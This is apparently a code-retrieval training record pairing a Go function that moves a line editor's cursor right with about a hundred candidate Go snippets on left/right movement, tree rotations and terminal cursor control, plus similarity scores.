[ "func (e *LineEditor) CursorLeft() {\n\n\tif e.Cx > 0 {\n\t\te.Cx--\n\t}\n}", "func (i *Input) CursorLeft() {\n\tif i.Pos > 0 {\n\t\ti.Pos--\n\t}\n}", "func (d *Display) CursorLeft() error {\n\t_, err := d.port.Write([]byte(CursorLeft))\n\treturn err\n}", "func (c *Camera) MoveLeft() {\n\tc.x -= c.worldWidth / 10\n\tc.Update()\n}", "func (p *player) moveLeft() {\n\tp.setX(game.MaxInt(0, p.x()-1))\n\tp.setDirection(false)\n}", "func (c *Controller) Left() {\n\tc.Target.Translate(-10, 0)\n\tif c.Target.Collider.col.left == true {\n\t\tc.Target.Translate(11, 0)\n\t}\n}", "func (tm *Term) ScrollLeft() error {\n\ttm.ColSt = ints.MaxInt(tm.ColSt-1, 0)\n\treturn tm.Draw()\n}", "func (g *Game) moveLeft() {\n\tif g.state != gameStarted {\n\t\treturn\n\t}\n\n\tg.direction = 2\n\tg.play()\n}", "func moveCursorLeft(positionCursor *int, numberDigits int,listOfNumbers [6]int) {\n\n\tif *positionCursor == 0 { \t\t\t\t\t\t // Scenario 1: position of cursor at the beginning of list\n\n\t\t*positionCursor=numberDigits-1\t\t\t\t // set it to the end\n\n\t\tpositionCursor = &listOfNumbers[numberDigits-1] // sets address of position to be that of the correct element\n\n\t} else {\t\t\t\t\t\t\t\t\t\t // Scenario 2: position of cursor is not at the beginning of list\n\n\t\t*positionCursor--\t\t\t\t\t\t\t // decrease the value of position of the cursor\n\n\t\tvar temp = *positionCursor\t\t\t\t\t // temp variable for position of cursor\n\n\t\tpositionCursor = &listOfNumbers[temp] \t // sets address of position to be that of the correct element\n\t}\n}", "func (m *Machine) Left() {\n\tfmt.Printf(\">> LEFT\\n\")\n\t// If we're at the 0th position, then we need to expand our tape array:\n\tif m.position == 0 {\n\t\tsize := len(m.Tape)\n\t\tm.Tape = append(make([]Cell, size), m.Tape...)\n\t\tm.position += size\n\t}\n\n\tm.position -= 1\n}", "func (c *Console) Left(n Int) *Console {\n\tPrint(_CSI + n.ToString() + \"D\")\n\treturn c\n}", "func (r *RoverDriver) Left() {\n r.commands <- left\n}", "func moveTabLeft(o *Otop) error {\n\treturn o.moveTab(-1)\n}", "func (this *LCD) LeftToRight() {\n\tthis.mode |= LCD_ENTRYLEFT\n\tthis.command(LCD_ENTRYMODESET | this.mode)\n}", "func MoveLeftRename(cf CornerFace) CornerFace {\n\tswitch cf {\n\tcase FACE_FRONT:\n\t\treturn FACE_RIGHT\n\tcase FACE_LEFT:\n\t\treturn FACE_FRONT\n\tcase FACE_BACK:\n\t\treturn FACE_LEFT\n\tcase FACE_RIGHT:\n\t\treturn FACE_BACK\n\t}\n\treturn cf // no translation for top needed\n}", "func (m *Model) wordLeft() bool {\n\tif m.pos == 0 || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.cursorStart()\n\t}\n\n\tblink := false\n\ti := m.pos - 1\n\tfor i >= 0 {\n\t\tif unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos - 1)\n\t\t\ti--\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tfor i >= 0 {\n\t\tif !unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos - 1)\n\t\t\ti--\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn blink\n}", "func (tm *Term) FixLeft() error {\n\ttm.FixCols = ints.MaxInt(tm.FixCols-1, 0)\n\treturn tm.Draw()\n}", "func (s *System) Left() (err error) {\n\ts.mux.Lock()\n\tdefer s.mux.Unlock()\n\n\t// If we are currently displaying text and their is an image, then we should\n\t// no longer display the text, navigating the slide in two steps.\n\tif s.displayBoth && s.affirmations[s.activeAffirmationIndex].displayImage != nil {\n\t\ts.displayBoth = false // We've navigated to the beginning of a slide, show the image alone.\n\t\treturn\n\t}\n\n\tif s.activeAffirmationIndex == 0 {\n\t\ts.activeAffirmationIndex = s.maxAffirmationIndex()\n\t} else {\n\t\ts.activeAffirmationIndex--\n\t}\n\ts.displayBoth = true // We just navigated backwards to a slide, show the text.\n\treturn nil\n}", "func (n *Node) MoveLeft(p []int, i int) {\n\tif i%NumberColumns > 0 {\n\t\tc := n.ClonePuzzle()\n\t\ttemp := c[i-1]\n\t\tc[i-1] = c[i]\n\t\tc[i] = temp\n\n\t\tchild := NewPuzzle(c)\n\t\tchild.Move = boardPositions[i-1]\n\t\tchild.Parent = n\n\t\tchild.G = n.G + 1\n\t\tn.Children = append(n.Children, child)\n\t}\n}", "func (o *TileBounds) SetLeft(v int32) {\n\to.Left = &v\n}", "func (o DashboardSpacingOutput) Left() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DashboardSpacing) *string { return v.Left }).(pulumi.StringPtrOutput)\n}", "func (e *Tree) SetLeft(replacement *Tree) { e.left = replacement }", "func (b *TestDriver) Left(val int) error {\n\tlog.Printf(\"Left: %d\", val)\n\treturn nil\n}", "func (o DashboardSpacingPtrOutput) Left() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *DashboardSpacing) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Left\n\t}).(pulumi.StringPtrOutput)\n}", "func CursorPosX(x int) string {\n\treturn Esc + strconv.Itoa(x+1) + \"G\"\n}", "func (board *Board) Left() *Board {\n\tblankPosition := board.PositionOfBlank()\n\tif blankPosition%board.Dimension == 0 {\n\t\treturn nil\n\t}\n\n\tclone := board.Clone()\n\tclone.move = LEFT\n\ttile := clone.GetTileAt(blankPosition - 1)\n\tclone.SetTileAt(blankPosition-1, BLANK)\n\tclone.SetTileAt(blankPosition, tile)\n\tclone.cost = clone.g + clone.Cost()\n\treturn clone\n}", "func (o *WorkbookChart) SetLeft(v AnyOfnumberstringstring) {\n\to.Left = &v\n}", "func (s *State) RotateLeft() {\n\tif s.robotLost {\n\t\treturn\n\t}\n\tswitch s.direction {\n\tcase North:\n\t\ts.direction = West\n\t\tbreak\n\tcase South:\n\t\ts.direction = East\n\t\tbreak\n\tcase West:\n\t\ts.direction = South\n\t\tbreak\n\tcase East:\n\t\ts.direction = North\n\t\tbreak\n\t}\n}", "func (v Vect) TurnLeft() Vect {\n\tif v.X == 0 {\n\t\tif v.Y == 1 {\n\t\t\treturn Vect{-1, 0}\n\t\t}\n\t\tif v.Y == -1 {\n\t\t\treturn Vect{1, 0}\n\t\t}\n\t}\n\tif v.X == -1 {\n\t\treturn Vect{0, -1}\n\t}\n\treturn Vect{0, 1}\n}", "func LeftShift(scope *Scope, x tf.Output, y tf.Output) (z tf.Output) {\n\tif scope.Err() != nil {\n\t\treturn\n\t}\n\topspec := tf.OpSpec{\n\t\tType: \"LeftShift\",\n\t\tInput: []tf.Input{\n\t\t\tx, y,\n\t\t},\n\t}\n\top := scope.AddOperation(opspec)\n\treturn op.Output(0)\n}", "func Move(x, y float32) {\n\tgContext.Cursor.X = x\n\tgContext.Cursor.Y = y\n}", "func (p Permutator) Left() int {\n\t<- p.idle\n\tremaining := p.left()\n\tp.idle <- true\n\treturn remaining\n}", "func (e *LineEditor) CursorRight() {\n\t// right moves only if we're within a valid line.\n\t// for past EOF, there's no movement\n\tif e.Cx < len(e.Row) {\n\t\te.Cx++\n\t}\n}", "func (v *TextView) SetLeftMargin(margin int) {\n\tC.gtk_text_view_set_left_margin(v.native(), C.gint(margin))\n}", "func (sopsTxtJustify TextJustify) Left() TextJustify {\n\n\tlockStrOpsTextJustify.Lock()\n\n\tdefer lockStrOpsTextJustify.Unlock()\n\n\treturn TextJustify(1)\n}", "func (Screen *ScreenManager) MoveCursorForward(spaces int) {\n\tfmt.Fprintf(Screen.Buffer, MOVE_CURSOR_FORWARD_COLUMNS, spaces)\n\tif Screen.AutoFlush {\n\t\tScreen.Flush()\n\t}\n}", "func CursorMove(x, y int) string {\n\tvar s string\n\tif x < 0 {\n\t\ts = Esc + strconv.Itoa(-x) + \"D\"\n\t} else if x > 0 {\n\t\ts = Esc + strconv.Itoa(x) + \"C\"\n\t}\n\tif y < 0 {\n\t\ts += Esc + strconv.Itoa(-y) + \"A\"\n\t} else if y > 0 {\n\t\ts += Esc + strconv.Itoa(y) + \"B\"\n\t}\n\treturn s\n}", "func (n *Node) MoveDownLeft(p []int, i int) {\n\tif i%NumberColumns > 0 && i < 8 {\n\t\tc := n.ClonePuzzle()\n\t\ttemp := c[i+3]\n\t\tc[i+3] = c[i]\n\t\tc[i] = temp\n\n\t\tchild := NewPuzzle(c)\n\t\tchild.Move = boardPositions[i+3]\n\t\tchild.Parent = n\n\t\tchild.G = n.G + 1\n\t\tn.Children = append(n.Children, child)\n\t}\n}", "func ColumnLeft(name string) {\n\tidx := colIndex(name)\n\tif idx > 0 {\n\t\tswapCols(idx, idx-1)\n\t}\n}", "func Left(i int) int {\n\treturn 2 * i\n}", "func (xs *Sheet) SetMarginLeft(margin float64) {\n\txs.xb.lib.NewProc(\"xlSheetSetMarginLeftW\").\n\t\tCall(xs.self, F(margin))\n}", "func (m *Model) deleteWordLeft() bool {\n\tif m.pos == 0 || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.deleteBeforeCursor()\n\t}\n\n\t// Linter note: it's critical that we acquire the initial cursor position\n\t// here prior to altering it via SetCursor() below. As such, moving this\n\t// call into the corresponding if clause does not apply here.\n\toldPos := m.pos //nolint:ifshort\n\n\tblink := m.setCursor(m.pos - 1)\n\tfor unicode.IsSpace(m.value[m.pos]) {\n\t\tif m.pos <= 0 {\n\t\t\tbreak\n\t\t}\n\t\t// ignore series of whitespace before cursor\n\t\tblink = m.setCursor(m.pos - 1)\n\t}\n\n\tfor m.pos > 0 {\n\t\tif !unicode.IsSpace(m.value[m.pos]) {\n\t\t\tblink = m.setCursor(m.pos - 1)\n\t\t} else {\n\t\t\tif m.pos > 0 {\n\t\t\t\t// keep the previous space\n\t\t\t\tblink = m.setCursor(m.pos + 1)\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif oldPos > len(m.value) {\n\t\tm.value = m.value[:m.pos]\n\t} else {\n\t\tm.value = append(m.value[:m.pos], m.value[oldPos:]...)\n\t}\n\n\treturn blink\n}", "func Left(text string, size int) string {\n\tspaces := size - Length(text)\n\tif spaces <= 0 {\n\t\treturn text\n\t}\n\n\tvar buffer bytes.Buffer\n\tbuffer.WriteString(text)\n\n\tfor i := 0; i < spaces; i++ {\n\t\tbuffer.WriteString(space)\n\t}\n\treturn buffer.String()\n}", "func (this *BigInteger) ShiftLeft(n int64) *BigInteger {\n\tvar r *BigInteger = NewBigInteger()\n\tif n < 0 {\n\t\tthis.RShiftTo(-n, r)\n\t} else {\n\t\tthis.LShiftTo(n, r)\n\t}\n\treturn r\n}", "func (tv *TextView) ScrollCursorToLeft() bool {\n\t_, ri, _ := tv.WrappedLineNo(tv.CursorPos)\n\tif ri <= 0 {\n\t\treturn tv.ScrollToLeft(tv.ObjBBox.Min.X - int(tv.Sty.BoxSpace()) - 2)\n\t}\n\tcurBBox := tv.CursorBBox(tv.CursorPos)\n\treturn tv.ScrollToLeft(curBBox.Min.X)\n}", "func MoveCursorForward(bias int) {\n\tfmt.Fprintf(Screen, \"\\033[%dC\", bias)\n}", "func (tree *BinaryTree) SetLeft(value int) *BinaryTree {\n\ttree.left = &BinaryTree{value: value, left: nil, right: nil}\n\treturn tree\n}", "func llrbMoveRedLeft(root *llrbNode) *llrbNode {\n llrbFlipColor(root)\n if llrbIsRed(root.right.left) {\n root.right = llrbRotateRight(root.right)\n root = llrbRotateLeft(root)\n llrbFlipColor(root)\n }\n return root\n}", "func (g *game) moveCursor(rowDelta, columnDelta int) {\n\tnewRow := g.selectedIndex.Row + rowDelta\n\tnewColumn := g.selectedIndex.Column + columnDelta\n\n\tif newRow >= 0 && newRow < g.Height && newColumn >= 0 && newColumn < g.Width {\n\t\tg.selectedIndex.Row = newRow\n\t\tg.selectedIndex.Column = newColumn\n\t\tg.Render()\n\t}\n}", "func (tree *Tree) Left() *Node {\n\tvar parent *Node\n\tcurrent := tree.Root\n\tfor current != nil {\n\t\tparent = current\n\t\tcurrent = current.Left\n\t}\n\treturn parent\n}", "func (i *Interface) ClickLeft(double bool) *astibob.Cmd {\n\treturn &astibob.Cmd{\n\t\tAbilityName: name,\n\t\tEventName: websocketEventNameAction,\n\t\tPayload: PayloadAction{\n\t\t\tAction: actionClickLeft,\n\t\t\tDouble: double,\n\t\t},\n\t}\n}", "func (b *Bound) Left() float64 {\n\treturn b.sw[0]\n}", "func (me *BitStream) Left() int {\n\treturn me.Bits - me.Index\n}", "func MoveTopLeft() {\n\tfmt.Print(\"\\033[H\")\n}", "func (p *Player) LeftAccelerate(dist float32) {\n\tp.Speed = limitHSpeed(p.Speed.Add(p.SideFacingDir(dist)))\n}", "func (p Permutator) left() int {\n\treturn (p.amount - p.index) + 1\n}", "func (tree *UTree) Left() *Node {\r\n\tvar parent *Node\r\n\tcurrent := tree.root\r\n\tfor current != nil {\r\n\t\tparent = current\r\n\t\tcurrent = current.left\r\n\t}\r\n\treturn parent\r\n}", "func (e *Tree) PushLeft(value interface{}) *Tree {\n\treturn e.pushTree(\"left\", value)\n}", "func (e *Tree) Left() *Tree { return e.left }", "func (this *LCD) RightToLeft() {\n\tthis.mode = byte(int8(^LCD_ENTRYLEFT) & int8(this.mode))\n\tthis.command(LCD_ENTRYMODESET | this.mode)\n}", "func (rbTree *RBTree)rotateLeft(X *treeNode) {\n\tvar Y = X.right\n\t// move W to X's right child\n\tX.right = Y.left\n\tif Y.left != nil {\n\t\tY.left.father = X\n\t}\n\t// move Y to X's father's child\n\tY.father = X.father\n\tif X == rbTree.root {\n\t\t// X is root\n\t\trbTree.root = Y\n\t} else if X == X.father.left {\n\t\t// X is father's left child\n\t\tX.father.left = Y\n\t} else {\n\t\t// X is father's right child\n\t\tX.father.right = Y\n\t}\n\t// move X to Y's left child\n\tY.left = X\n\tX.father = Y\n}", "func CursorForward(c uint) {\n\temitEscape(\"C\", c)\n}", "func left(index int) int {\n\treturn 2*index + 1\n}", "func (i *Input) CursorRight() {\n\tif i.Pos < i.Buffer.Len() {\n\t\ti.Pos++\n\t}\n}", "func (fn *formulaFuncs) LEFT(argsList *list.List) formulaArg {\n\treturn fn.leftRight(\"LEFT\", argsList)\n}", "func (ebox *Editbox) moveCursorDown() {\n\tif ebox.wrap {\n\t\ted := ebox.editor\n\t\tline := ed.currentLine()\n\t\t// Try to move within current line\n\t\tif ed.cursor.x+ebox.width < len(line.text) {\n\t\t\ted.cursor.x += ebox.width\n\t\t\treturn\n\t\t}\n\t\tif ebox.cursor.x+(len(line.text)-ed.cursor.x)-1 >= ebox.width {\n\t\t\ted.cursor.x = line.lastRuneX()\n\t\t\treturn\n\t\t}\n\t\t// Jump to next line\n\t\tif ed.cursor.y+1 > len(ed.lines)-1 {\n\t\t\treturn\n\t\t}\n\t\ted.cursor.y += 1\n\t\tline = ed.currentLine()\n\t\tif len(line.text) == 0 {\n\t\t\ted.cursor.x = 0\n\t\t\treturn\n\t\t}\n\t\tx, _ := ebox.editorToBox(ed.lastx, 0)\n\t\tif x >= len(line.text) {\n\t\t\ted.cursor.x = line.lastRuneX()\n\t\t} else {\n\t\t\ted.cursor.x = x\n\t\t}\n\t} else {\n\t\tebox.editor.moveCursorVert(+1)\n\t}\n}", "func LeftChild(index, depth uint) (uint, error) {\n\tif index&1 == 0 {\n\t\treturn 0, errors.New(\"No left child\")\n\t}\n\tif depth == 0 {\n\t\tdepth = Depth(index)\n\t}\n\n\treturn Index(depth-1, Offset(index, depth)*2), nil\n}", "func MoveToLeftEdge(column uint) func(int) int {\n\tc := int(column - 1)\n\treturn func(n int) int {\n\t\tif n==0 {\n\t\t\treturn c\n\t\t}\n\t\tif n <= c {\n\t\t\treturn n - 1\n\t\t}\n\t\treturn n\n\t}\n}", "func left(i int) int {\n\treturn i*2 + 1\n}", "func MoveCursor(pos int, d int) []byte {\n\tp := []byte(fmt.Sprintf(\"%d\", pos))\n\treturn concat(open, p, dir[d])\n}", "func (pd *philosopherData) SetLeftChop(leftChop int) {\n\tpd.leftChopstick = leftChop\n}", "func leftRotate(node *Node) *Node {\n\ttempNode := node.right\n\tnode.right = tempNode.left\n\ttempNode.left = node\n\treturn tempNode\n}", "func (tv *TextView) CursorForward(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tfor i := 0; i < steps; i++ {\n\t\ttv.CursorPos.Ch++\n\t\tif tv.CursorPos.Ch > tv.Buf.LineLen(tv.CursorPos.Ln) {\n\t\t\tif tv.CursorPos.Ln < tv.NLines-1 {\n\t\t\t\ttv.CursorPos.Ch = 0\n\t\t\t\ttv.CursorPos.Ln++\n\t\t\t} else {\n\t\t\t\ttv.CursorPos.Ch = tv.Buf.LineLen(tv.CursorPos.Ln)\n\t\t\t}\n\t\t}\n\t}\n\ttv.SetCursorCol(tv.CursorPos)\n\ttv.SetCursorShow(tv.CursorPos)\n\ttv.CursorSelect(org)\n}", "func (b *TestDriver) LeftFlip() (err error) {\n\tb.Publish(Rolling, true)\n\treturn nil\n}", "func RotateLeft(t TermT, n uint32) TermT {\n\treturn TermT(C.yices_rotate_left(C.term_t(t), C.uint32_t(n)))\n}", "func left(i int) int {\r\n\treturn (i * 2) + 1\r\n}", "func (v *TextView) GetLeftMargin() int {\n\tc := C.gtk_text_view_get_left_margin(v.native())\n\treturn int(c)\n}", "func (e Equation) Left() Type {\n\treturn e.left\n}", "func (app *upApplication) GSLeftwards() {\n\tapp.teleportSettings.Reverse = true\n\tapp.teleportSettings.Vertical = false\n\tapp.teleportSettings.Length = upTeleportLen\n}", "func LeftRotate(x *Node) *Node {\n\tif x.IsNil {\n\t\treturn x\n\t}\n\n\txRight := x.RightChild\n\t// Get right Child\n\t//\n\tif xRight.IsNil {\n\t\treturn xRight\n\t}\n\n\t// Assign parent of x as parent of right child\n\t//\n\txParent := x.Parent\n\txRight.Parent = xParent\n\tif !xParent.IsNil {\n\t\tif xParent.LeftChild == x {\n\t\t\txParent.LeftChild = xRight\n\t\t} else if xParent.RightChild == x {\n\t\t\txParent.RightChild = xRight\n\t\t}\n\t}\n\n\txRightLeft := xRight.LeftChild\n\n\t// Set xright as the parent of x\n\t//\n\tx.Parent = xRight\n\txRight.LeftChild = x\n\n\t// Set right child of x to the left child of xright\n\t//\n\tx.RightChild = xRightLeft\n\tif !xRightLeft.IsNil {\n\t\txRightLeft.Parent = x\n\t}\n\n\treturn xRight\n}", "func (self SimpleInterval) Left() float64 {\n\treturn self.LR[0]\n}", "func LeftRotate(n *Node) *Node {\n\tr := n.Right\n\tif r == nil {\n\t\treturn n\n\t}\n\n\tn.Right = r.Left\n\tr.Left = n\n\n\treturn r\n}", "func (t *RedBlackTree) rotateLeft(node *Node) {\n\tright := node.right\n\tt.swapNodes(node, right)\n\tnode.right = right.left\n\tif right.left != nil {\n\t\tright.left.parent = node\n\t}\n\tright.left = node\n\tnode.parent = right\n}", "func (n *Node) MoveUpLeft(p []int, i int) {\n\tif i%NumberColumns > 0 && i-NumberColumns >= 0 {\n\t\tc := n.ClonePuzzle()\n\t\ttemp := c[i-5]\n\t\tc[i-5] = c[i]\n\t\tc[i] = temp\n\n\t\tchild := NewPuzzle(c)\n\t\tchild.Move = boardPositions[i-5]\n\t\tchild.Parent = n\n\t\tchild.G = n.G + 1\n\t\tn.Children = append(n.Children, child)\n\t}\n}", "func PanLeft(image *dali.Canvas, iterations, focalPointReal *dali.InputElement, vp *ViewPort,\n\tcontrol *sync.Mutex, progress *dali.ProgressElement) {\n\tcontrol.Lock()\n\tdefer control.Unlock()\n\tlength := 4 * vp.ZoomLevel\n\tvp.ImaginaryPlaneFocalPoint -= complex(0.1*length, 0)\n\n\tiv := iterations.Value()\n\ti, _ := strconv.Atoi((iv))\n\tDrawMandelbrot(\n\t\tvp,\n\t\ti,\n\t\timage,\n\t\tprogress)\n\n\tfocalPointReal.Set(fmt.Sprintf(\"%.14f\", real(vp.ImaginaryPlaneFocalPoint)))\n}", "func (tree *RBTree) rotateLeft(node *RBTreeNode) {\n\tif node == nil {\n\t\treturn\n\t}\n\tr := node.right\n\tnode.right = r.left\n\tif r.left != nil {\n\t\tr.left.parent = node\n\t}\n\n\tr.parent = node.parent\n\tif node.parent == nil {\n\t\ttree.root = r\n\t} else {\n\t\tif node.parent.left == node {\n\t\t\tnode.parent.left = r\n\t\t} else {\n\t\t\tnode.parent.right = r\n\t\t}\n\t}\n\tnode.parent = r\n\tr.left = node\n}", "func (b *Board) checkLeft(row int, column int) {\n\tif b.connected < 3 && column > 0 {\n\t\tif b.positions[row][column] == b.positions[row][column-1] {\n\t\t\tb.connected++\n\t\t\tb.checkLeft(row, column-1)\n\t\t}\n\t}\n}", "func rotateLeft(buf []byte, rc uint) (out []byte) {\n\tdefer func() {\n\t\tout = buf\n\t}()\n\n\tif len(buf) == 0 || rc == 0 {\n\t\treturn\n\t}\n\n\trc %= uint(len(buf))\n\tif rc == 0 {\n\t\treturn\n\t}\n\n\ttmpBuf := make([]byte, rc)\n\tcopy(tmpBuf, buf[0:rc])\n\tcopy(buf, buf[rc:])\n\tcopy(buf[uint(len(buf))-rc:], tmpBuf)\n\n\treturn\n}", "func lexLeftDelim(l *lexer) stateFn {\n\tl.pos += Pos(len(l.leftDelim))\n\tif strings.HasPrefix(l.input[l.pos:], leftComment) {\n\t\treturn lexComment\n\t}\n\tl.emit(itemLeftDelim)\n\tl.parenDepth = 0\n\treturn lexInsideAction\n}", "func rotateLeft(n *rbnode) *rbnode {\n\tif n.right == nil {\n\t\treturn n\n\t}\n\tr := n.right\n\tconnectRight(n, r.left)\n\treplaceChild(n, r)\n\tconnectLeft(r, n)\n\tn.c, r.c = r.c, n.c\n\treturn r\n}", "func (node *node) leftRotate() *node {\n\tvar x = node.RightNode\n\tvar t2 = x.LeftNode\n\n\tx.LeftNode = node\n\tnode.RightNode = t2\n\n\tnode.height = max(getHeight(node.LeftNode), getHeight(node.RightNode)) + 1\n\tx.height = max(getHeight(x.LeftNode), getHeight(x.RightNode)) + 1\n\n\treturn x\n}", "func (hw *HighlightedWriter) CursorForward(n int) {\n\thw.delegate.CursorForward(n)\n}", "func (d *Display) CursorRight() error {\n\t_, err := d.port.Write([]byte(CursorRight))\n\treturn err\n}", "func (rbst *RBSTAbelGroup) RotateLeft(root *Node, start, stop, k int) *Node {\r\n\tstart++\r\n\tk %= (stop - start + 1)\r\n\r\n\tx, y := rbst.SplitByRank(root, start-1)\r\n\ty, z := rbst.SplitByRank(y, k)\r\n\tz, p := rbst.SplitByRank(z, stop-start+1-k)\r\n\treturn rbst.Merge(rbst.Merge(rbst.Merge(x, z), y), p)\r\n}", "func (ls *linestate) editMoveRight() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos++\n\t\tls.refreshLine()\n\t}\n}", "func (g *GroupCallParticipant) SetLeft(value bool) {\n\tif value {\n\t\tg.Flags.Set(1)\n\t\tg.Left = true\n\t} else {\n\t\tg.Flags.Unset(1)\n\t\tg.Left = false\n\t}\n}", "func (view *ListView) MoveCursor(dir Direction) {\n\tswitch dir {\n\tcase Up:\n\t\tif view.curline > 0 {\n\t\t\tview.curline--\n\t\t}\n\tcase Down:\n\t\tif view.curline < view.h-1 {\n\t\t\tview.curline++\n\t\t}\n\t}\n\tview.Refresh()\n}", "func (unpacker *BitUnpacker) Left() uint32 {\n\treturn unpacker.size - (unpacker.pbyte*8 + unpacker.pbit)\n}", "func MoveCursor(x int, y int) {\n\tfmt.Fprintf(Screen, \"\\033[%d;%dH\", y, x)\n}", "func (p *Pager) moveRight(delta int) {\n\tif p.ShowLineNumbers && delta > 0 {\n\t\tp.ShowLineNumbers = false\n\t\treturn\n\t}\n\n\tif p.leftColumnZeroBased == 0 && delta < 0 {\n\t\tp.ShowLineNumbers = true\n\t\treturn\n\t}\n\n\tresult := p.leftColumnZeroBased + delta\n\tif result < 0 {\n\t\tp.leftColumnZeroBased = 0\n\t} else {\n\t\tp.leftColumnZeroBased = result\n\t}\n}" ]
[ "0.7997701", "0.7938411", "0.78383493", "0.71686447", "0.7092171", "0.69622624", "0.69529593", "0.68944913", "0.6806713", "0.67822456", "0.6753121", "0.6689498", "0.65439445", "0.6536123", "0.6495173", "0.64557284", "0.641655", "0.6380656", "0.62823004", "0.6266162", "0.6251246", "0.6208445", "0.61458766", "0.6128165", "0.61233544", "0.6076572", "0.60621554", "0.60349965", "0.6024509", "0.5945503", "0.5902993", "0.59009475", "0.58706146", "0.58569735", "0.58393145", "0.58308655", "0.58231366", "0.5807882", "0.5803493", "0.57834274", "0.57470334", "0.57463336", "0.57400787", "0.57109994", "0.5702343", "0.56829226", "0.56804806", "0.5678525", "0.5677518", "0.5662914", "0.564806", "0.56458265", "0.5628782", "0.56181186", "0.56108683", "0.56101716", "0.5602254", "0.5589822", "0.55875164", "0.55725384", "0.55571675", "0.5547483", "0.5533819", "0.55275977", "0.552524", "0.55168515", "0.55088234", "0.5506537", "0.55056936", "0.5503082", "0.5491303", "0.548611", "0.54768515", "0.5473932", "0.5462238", "0.54590744", "0.54417396", "0.5432385", "0.540591", "0.5403418", "0.53905314", "0.53803", "0.5377894", "0.53720886", "0.5370001", "0.5367705", "0.53617454", "0.5359959", "0.5351163", "0.53508884", "0.53451854", "0.53158855", "0.5306191", "0.5302816", "0.52928513", "0.52847165", "0.528277", "0.52716786", "0.52648705", "0.5259161" ]
0.7620068
3
Move cursor to the right.
func (ls *linestate) editMoveRight() { if ls.pos != len(ls.buf) { ls.pos++ ls.refreshLine() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (i *Input) CursorRight() {\n\tif i.Pos < i.Buffer.Len() {\n\t\ti.Pos++\n\t}\n}", "func (e *LineEditor) CursorRight() {\n\t// right moves only if we're within a valid line.\n\t// for past EOF, there's no movement\n\tif e.Cx < len(e.Row) {\n\t\te.Cx++\n\t}\n}", "func (d *Display) CursorRight() error {\n\t_, err := d.port.Write([]byte(CursorRight))\n\treturn err\n}", "func moveCursorRight( positionCursor *int, numberDigits int, listOfNumbers [6]int) {\n\n\tif *positionCursor == numberDigits-1 { \t\t// Scenario 1: position of cursor at the end of list\n\n\t\t*positionCursor = 0\t\t\t\t\t\t// set it to the beginning\n\n\t\tpositionCursor = &listOfNumbers[0]\t // sets address of position to be that of the correct element\n\n\t} else {\t\t\t\t\t\t\t\t\t// Scenario 2: position of cursor is not at the end of list\n\n\t\t*positionCursor++\t\t\t\t\t\t// increase the value of position of the cursor\n\n\t\tvar temp = *positionCursor\t\t\t\t// temp variable for position of cursor\n\n\t\tpositionCursor = &listOfNumbers[temp]\t// sets address of position to be that of the correct element\n\t}\n }", "func (p *Pager) moveRight(delta int) {\n\tif p.ShowLineNumbers && delta > 0 {\n\t\tp.ShowLineNumbers = false\n\t\treturn\n\t}\n\n\tif p.leftColumnZeroBased == 0 && delta < 0 {\n\t\tp.ShowLineNumbers = true\n\t\treturn\n\t}\n\n\tresult := p.leftColumnZeroBased + delta\n\tif result < 0 {\n\t\tp.leftColumnZeroBased = 0\n\t} else {\n\t\tp.leftColumnZeroBased = result\n\t}\n}", "func (this *LCD) LeftToRight() {\n\tthis.mode |= LCD_ENTRYLEFT\n\tthis.command(LCD_ENTRYMODESET | this.mode)\n}", "func (p *player) moveRight() {\n\tp.setX(game.MinInt(cols-1, p.x()+1))\n\tp.setDirection(true)\n}", "func (tm *Term) ScrollRight() error {\n\ttm.ColSt++ // no obvious max\n\treturn tm.Draw()\n}", "func (m *Machine) Right() {\n\tfmt.Printf(\">> RIGHT\\n\")\n\t// If we're at the last position, then we need to expand our tape array:\n\tif m.position == (len(m.Tape) - 1) {\n\t\tsize := len(m.Tape)\n\t\tm.Tape = append(m.Tape, make([]Cell, size)...)\n\t}\n\n\tm.position += 1\n}", "func (this *LCD) RightToLeft() {\n\tthis.mode = byte(int8(^LCD_ENTRYLEFT) & int8(this.mode))\n\tthis.command(LCD_ENTRYMODESET | this.mode)\n}", "func (g *Game) moveRight() {\n\tif g.state != gameStarted {\n\t\treturn\n\t}\n\n\tg.direction = 1\n\tg.play()\n}", "func (c *Camera) MoveRight() {\n\tc.x += c.worldWidth / 10\n\tc.Update()\n}", "func (c *Controller) Right() {\n\tc.Target.Translate(10, 0)\n\tif c.Target.Collider.col.right == true {\n\t\tc.Target.Translate(-11, 0)\n\t}\n}", "func (tm *Term) FixRight() error {\n\ttm.FixCols++ // no obvious max\n\treturn tm.Draw()\n}", "func (r *RoverDriver) Right() {\n r.commands <- right\n}", "func (c *Console) Right(n Int) *Console {\n\tPrint(_CSI + n.ToString() + \"C\")\n\treturn c\n}", "func (m *Model) wordRight() bool {\n\tif m.pos >= len(m.value) || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.cursorEnd()\n\t}\n\n\tblink := false\n\ti := m.pos\n\tfor i < len(m.value) {\n\t\tif unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos + 1)\n\t\t\ti++\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tfor i < len(m.value) {\n\t\tif !unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos + 1)\n\t\t\ti++\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn blink\n}", "func (tv *TextView) ScrollCursorToRight() bool {\n\tcurBBox := 